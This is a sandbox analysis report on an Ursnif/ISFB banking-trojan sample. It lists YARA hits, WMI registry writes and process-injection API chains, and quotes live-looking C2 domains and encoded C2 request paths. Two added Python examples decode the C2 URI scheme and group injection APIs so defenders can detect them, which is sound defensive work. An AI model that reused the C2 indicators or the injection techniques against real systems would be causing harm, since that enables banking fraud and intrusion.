Source: powershell.exe, 00000019.00000002.553214576.0000011326CB0000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000013.00000002.523197029.0000020480001000.00000004.00000001.sdmp, powershell.exe, 00000019.00000002.552701952.0000011326AA1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000019.00000002.553214576.0000011326CB0000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000013.00000002.561220154.000002049005F000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000013.00000002.561220154.000002049005F000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000013.00000002.561220154.000002049005F000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000019.00000002.553214576.0000011326CB0000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000013.00000002.561220154.000002049005F000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
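The request paths above, together with the ET rule names in the Snort alerts (2033203 keys on the literal _2B, 2033204 on _2F), show the ISFB URI scheme: a base64 blob whose '+' and '/' are rewritten as _2B and _2F, whose '=' padding is dropped, and into which random '/' separators are inserted. The insertion is why the report contains markers broken across a separator (7NgceSVLwb_/2FKB, cd8IEyE4_2/FI8A) that a content match on the raw URI cannot see. Note also the two user agents: the 32-bit Firefox string towards gtr.antoinfer.com and the Win64; x64 string towards app.flashgameo.at, the first c2_domain in the extracted configuration. The following is an added example for this page, not code from the report or from the malware. The decoding rules are an analyst's reconstruction, the three REPORT_PATHS are copied from the report, the BENIGN_PATHS are made up, and the recovered bytes stay encrypted: the configuration's serpent_key would be needed and Serpent is not implemented here. For the three report paths the recovered payloads come out to 224, 224 and 240 bytes, all multiples of the 16-byte Serpent block.

```python
r"""Decoder for the Ursnif/ISFB C2 URI structure that ET rules 2033203 (_2B) and 2033204 (_2F)
match on. Added example for this page; not code from the report or from the malware. The
decoding rules are an analyst's reconstruction, REPORT_PATHS are copied from the report's HTTP
requests, BENIGN_PATHS are made up, and the recovered bytes stay encrypted (Serpent, per the
config's serpent_key, is not implemented here)."""
import base64
import re
from typing import Dict, Optional

MARKER = re.compile(r"_2([BF])")
B64 = re.compile(r"[A-Za-z0-9+/]+")


def recover_payload(path: str) -> Optional[bytes]:
    """Undo the URI obfuscation and return the raw ciphertext, or None if it is not base64."""
    body = path.lstrip("/")
    # Some variants append a decoy file extension; none in this sample, so this is a precaution.
    body = re.sub(r"\.[A-Za-z0-9]{1,5}$", "", body)
    # Remove the random separators before touching the markers: the report shows
    # markers broken across a '/' ('..._2/F...', '..._/2B...').
    body = body.replace("/", "")
    body = MARKER.sub(lambda m: "+" if m.group(1) == "B" else "/", body)
    pad = (-len(body)) % 4                 # the '=' padding was dropped; put it back
    if pad == 3 or not B64.fullmatch(body):
        return None
    try:
        return base64.b64decode(body + "=" * pad, validate=True)
    except ValueError:
        return None


def analyze(path: str) -> Dict[str, object]:
    """Structural features of one request path."""
    payload = recover_payload(path)
    size = len(payload) if payload else 0
    return {
        "segments": path.strip("/").count("/") + 1,
        "raw_2B": "_2B" in path,   # what a content match on the raw URI (ET 2033203) sees
        "raw_2F": "_2F" in path,   # same for ET 2033204
        "split_markers": len(re.findall(r"_2/[BF]|_/2[BF]", path)),  # invisible to a raw match
        "payload_len": size,
        # Serpent is a 16-byte block cipher, so a CBC ciphertext should be block-aligned.
        "block_aligned": size > 0 and size % 16 == 0,
    }


def ursnif_like(path: str) -> bool:
    """Heuristic: many short segments, a marker once the separators are gone, and a
    block-aligned base64 payload of meaningful size."""
    f = analyze(path)
    joined = path.replace("/", "")
    return bool(f["segments"] >= 5 and ("_2B" in joined or "_2F" in joined)
                and f["payload_len"] >= 64 and f["block_aligned"])


# Copied from the report: two GETs to gtr.antoinfer.com and the GET to app.flashgameo.at.
REPORT_PATHS = [
    "/FXZ4lJvs/pnPhoUboMRVeoTe_2BxFQHV/VrMabiiED1/fjSHMBnhaHvqGkBru/BBTTQ6QwiwG2/i_2B4XLvHY3/zQLJ0W4RRFNlvQ/B3u_2FSgrcZQDj_2BbFWa/Bx8WB7z_2BuLUgre/PCgyAB0W6V5ZAPj/EUhKDrtuQoVEfKF_2F/dcW7lxG1t/oqJkrgpYdakzYVLuFura/45KMjCH_2BPWhKVH2At/F3l8q550AYqbFa84glQVmt/K2gCe0Lr0TKfs/y_2FaOCB/ygw2OjZ6hu69MXjNR4EuLCN/Av5n84Tspg/9rzu_2F5EAjaDhz2A/PQ8PWyfZ/9t_2F",
    "/p0mrlA_2F3nwmuOO5YjXTbA/cd8IEyE4_2/FI8A_2FRC5apSNIFU/7NfGVV9uGpRL/s6DAoaMbBtN/eYfp7C4d_2F3Is/s4XG4SPnRiQ7lPcEUOZTG/dYTbEto_2F1qrOzS/I0vg3Aj3uP5f_2F/4uoaP31e5KEGdC1u9L/oWhwQd6oE/Nvhp83GHi3mH9zcVaKW0/JwD5AHcQxGrogNbSOUn/soZuo4elXh3sevhCFwKNDb/LefWHBaTOp39g/WKwxmRdA/L1LsDG1W8J3kilFzwHSP3cM/ofk_2BkzS2/fYG6a0xp2L0bHH9qT/VzjD_2B4vW7z/v2KCn",
    "/De X5GWZg0Peq/7NgceSVLwb_/2FKBdrhD_2BrPB/8c1uiDVblu0VRxOwf86RB/7RlrJfNAcSl8yK9M/_2BR6tZsQdJK7DQ/0XeQ_2FDLrv1nAxzaB/T3xKAFAr_/2Fp4Ltq73VjaHHoQztD1/x183TFWpQzC6_2F2n_2/FW_2BJ7_2BLURkcNjyg4hv/iERXmjmDxZ_2B/MqlUCL1c/d0YTAfP_2B2t_2FpDPiA4C7/kp7kRE_2BM/6ThuCNdgd0HyvWufQ/x61l_2FymcLS/YGjjC9Byoh4/QKUChdjQOX9Lh8/tWuTsS4vrxaovoeb8MTe0/n0ug3jEb10v8CjXy/4y_2Bffi5hDHF4e/taOpwFWZ_2FIS/gE".replace(" ", ""),
]
# Made-up benign paths for contrast.
BENIGN_PATHS = ["/images/logo.png", "/api/v1/users/12345/orders/2021/08/03/items"]

if __name__ == "__main__":
    for p in REPORT_PATHS + BENIGN_PATHS:
        print(ursnif_like(p), analyze(p))
```

Feed analyze() the request paths from proxy or IDS logs: the combination of many short segments, a marker after the separators are removed, and a block-aligned payload is a tighter match than either content rule alone, and split_markers shows how a marker can drop out of a raw-URI content match without changing what the bot sends.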

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.397556594.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374227278.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434124521.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.534765366.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434060838.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397622522.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397589601.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451828519.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434180314.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.433841942.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451943735.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434086354.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.433993641.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374321927.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.381487289.0000000003D4C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.400741331.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.406917672.0000000004DDC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397430655.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374277769.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451905542.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374345773.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374301760.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.459171611.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397475800.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.451696004.000001B2312CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397396701.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434150338.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.543947285.000000000F1EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.434024374.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.377109820.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.433927552.0000000004EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374368880.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397343718.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.397511011.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374359544.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.374253980.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5780, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4604, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2224, type: MEMORYSTR

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: the same memory dumps and process memory spaces (loaddll32.exe PID: 5780, rundll32.exe PID: 4604, control.exe PID: 2224) listed under "Key, Mouse, Clipboard, Microphone and Screen Capturing" above
Source: Yara match File source: 00000000.00000003.374253980.0000000003F48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5780, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4604, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2224, type: MEMORYSTR
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00D94CEA CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 4_2_00D94CEA

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD812CE NtCreateSection,memset, 0_2_6DD812CE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD81E74 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_6DD81E74
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD8192C NtMapViewOfSection, 0_2_6DD8192C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD82495 NtQueryVirtualMemory, 0_2_6DD82495
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_031433A6 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 0_2_031433A6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0312CBA7 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_0312CBA7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03140A00 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 0_2_03140A00
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03136A33 NtQueryInformationProcess, 0_2_03136A33
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0313790F NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_0313790F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_031351A4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_031351A4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_031268EE NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 0_2_031268EE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03124F72 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 0_2_03124F72
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0313A680 NtMapViewOfSection, 0_2_0313A680
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03134D10 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 0_2_03134D10
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_031425B9 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 0_2_031425B9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03123C5B NtCreateSection,memset, 0_2_03123C5B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0314133A NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 0_2_0314133A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_031403BD NtQuerySystemInformation,RtlNtStatusToDosError, 0_2_031403BD
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0312C240 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 0_2_0312C240
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03128936 memset,NtQueryInformationProcess, 0_2_03128936
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_031309C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 0_2_031309C7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0313E543 NtGetContextThread,RtlNtStatusToDosError, 0_2_0313E543
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0313AD9A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_0313AD9A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0312349A memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 0_2_0312349A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00D91ADF GetProcAddress,NtCreateSection,memset, 4_2_00D91ADF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00D925E5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 4_2_00D925E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00D94F6E NtMapViewOfSection, 4_2_00D94F6E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00D98055 NtQueryVirtualMemory, 4_2_00D98055
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05374D10 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 4_2_05374D10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05364F72 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 4_2_05364F72
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_053751A4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 4_2_053751A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_053668EE NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 4_2_053668EE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_053833A6 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 4_2_053833A6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05376A33 NtQueryInformationProcess, 4_2_05376A33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05380A00 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 4_2_05380A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0537E543 NtGetContextThread,RtlNtStatusToDosError, 4_2_0537E543
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0537AD9A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 4_2_0537AD9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0536349A memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 4_2_0536349A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_05368936 memset,NtQueryInformationProcess, 4_2_05368936
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0537790F NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 4_2_0537790F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_053709C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 4_2_053709C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0538133A NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 4_2_0538133A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_053803BD NtQuerySystemInformation,RtlNtStatusToDosError, 4_2_053803BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0536CBA7 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 4_2_0536CBA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0536C240 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 4_2_0536C240
Source: C:\Windows\System32\control.exe Code function: 30_2_002679DC NtQueryInformationToken,NtQueryInformationToken,NtClose, 30_2_002679DC
Source: C:\Windows\System32\control.exe Code function: 30_2_0024C29C NtQueryInformationProcess, 30_2_0024C29C
Source: C:\Windows\System32\control.exe Code function: 30_2_002566D4 NtSetInformationProcess,CreateRemoteThread, 30_2_002566D4
Source: C:\Windows\System32\control.exe Code function: 30_2_0027F004 NtProtectVirtualMemory,NtProtectVirtualMemory, 30_2_0027F004
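Per-function API lists like the ones above are more useful once grouped per process, because the injection primitives are split across functions: NtCreateSection plus NtMapViewOfSection (present in both loaddll32.exe and rundll32.exe) map a section into a target, NtGetContextThread plus NtSetContextThread hijack a thread's register context, NtWriteVirtualMemory writes the foreign region, and control.exe, the final host, carries CreateRemoteThread (the Toolhelp32/OpenThread/QueueUserAPC loop listed further down in this section is the APC variant). The Python below is an added example, not part of the report: it parses "Code function" lines in this page's format (the input is copied from the lines above and constructed for the example), groups the APIs per process index and image, and reports which primitives are complete in each process together with the function ids that supply them. The primitive table and the function names are the author's own assumption, not something the sandbox emits.

```python
"""Group this report's 'Code function' lines per process and flag native-API
combinations that together form an injection primitive.

Added example, not part of the report. The input is copied from the report;
the primitive table and the function names are the author's own assumption.
"""
import re
from collections import defaultdict

# Constructed input: a subset of the 'Code function' lines from this report.
CODE_FUNCTION_LINES = r"""
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD812CE NtCreateSection,memset, 0_2_6DD812CE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD8192C NtMapViewOfSection, 0_2_6DD8192C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0312CBA7 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_0312CBA7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0313E543 NtGetContextThread,RtlNtStatusToDosError, 0_2_0313E543
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0312349A memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 0_2_0312349A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0313D325 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle, 0_2_0313D325
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00D91ADF GetProcAddress,NtCreateSection,memset, 4_2_00D91ADF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00D94F6E NtMapViewOfSection, 4_2_00D94F6E
Source: C:\Windows\System32\control.exe Code function: 30_2_002566D4 NtSetInformationProcess,CreateRemoteThread, 30_2_002566D4
Source: C:\Windows\System32\control.exe Code function: 30_2_0027F004 NtProtectVirtualMemory,NtProtectVirtualMemory, 30_2_0027F004
"""

# The trailing id repeats the leading one, so a backreference pins the API list.
LINE_RE = re.compile(
    r"^Source: (?P<image>\S+) Code function: (?P<fn>(?P<proc>\d+)_\d+_[0-9A-Fa-f]+) "
    r"(?P<apis>[\w,]+), (?P=fn)$"
)

# Author's assumption: API sets that, seen together in one process, make up a
# recognisable injection primitive. Order only affects the report output.
PRIMITIVES = [
    ("section mapping into another process", {"NtCreateSection", "NtMapViewOfSection"}),
    ("thread context hijacking", {"NtGetContextThread", "NtSetContextThread"}),
    ("APC queueing into existing threads", {"OpenThread", "QueueUserAPC"}),
    ("remote thread creation", {"CreateRemoteThread"}),
    ("writing foreign memory", {"NtWriteVirtualMemory"}),
]


def parse(text):
    """(process index, image basename) -> {api name: [function ids using it]}."""
    calls = defaultdict(lambda: defaultdict(list))
    for line in text.strip().splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        key = (int(m["proc"]), m["image"].rsplit("\\", 1)[-1].lower())
        for api in m["apis"].split(","):
            if m["fn"] not in calls[key][api]:
                calls[key][api].append(m["fn"])
    return calls


def injection_primitives(calls):
    """Per process: [(primitive name, {api: [function ids]})] for every
    primitive whose full API set is present, even when spread over functions."""
    hits = {}
    for key, apis in calls.items():
        found = [(name, {api: apis[api] for api in sorted(required)})
                 for name, required in PRIMITIVES if required.issubset(apis)]
        if found:
            hits[key] = found
    return hits


def summarize(text):
    """One line per (process, primitive), naming the functions to look at."""
    out = []
    for (idx, image), found in sorted(injection_primitives(parse(text)).items()):
        for name, where in found:
            fns = sorted({fn for fns in where.values() for fn in fns})
            out.append(f"[{idx}] {image}: {name} via {', '.join(fns)}")
    return out


if __name__ == "__main__":
    print("\n".join(summarize(CODE_FUNCTION_LINES)))
```

Run against the full report rather than this subset, the same grouping also surfaces the second copy of the injector code that rundll32.exe carries at a different base (the 4_2_0536xxxx functions mirror the 0_2_0312xxxx ones in loaddll32.exe), which is a useful hint that the loader maps itself rather than the original DLL into its hosts.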
Contains functionality to launch a process as a different user
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03125195 CreateProcessAsUserW, 0_2_03125195
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DD82274 0_2_6DD82274
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0312B2A4 0_2_0312B2A4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0312EAFA 0_2_0312EAFA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_031298A0 0_2_031298A0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0312D8E5 0_2_0312D8E5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03122F9C 0_2_03122F9C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03130F82 0_2_03130F82
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0313DE9A 0_2_0313DE9A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0313ED58 0_2_0313ED58
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0313F4BE 0_2_0313F4BE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_03141CD6 0_2_03141CD6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00D96680 4_2_00D96680
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00D97E30 4_2_00D97E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00D9175B 4_2_00D9175B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0537ED58 4_2_0537ED58
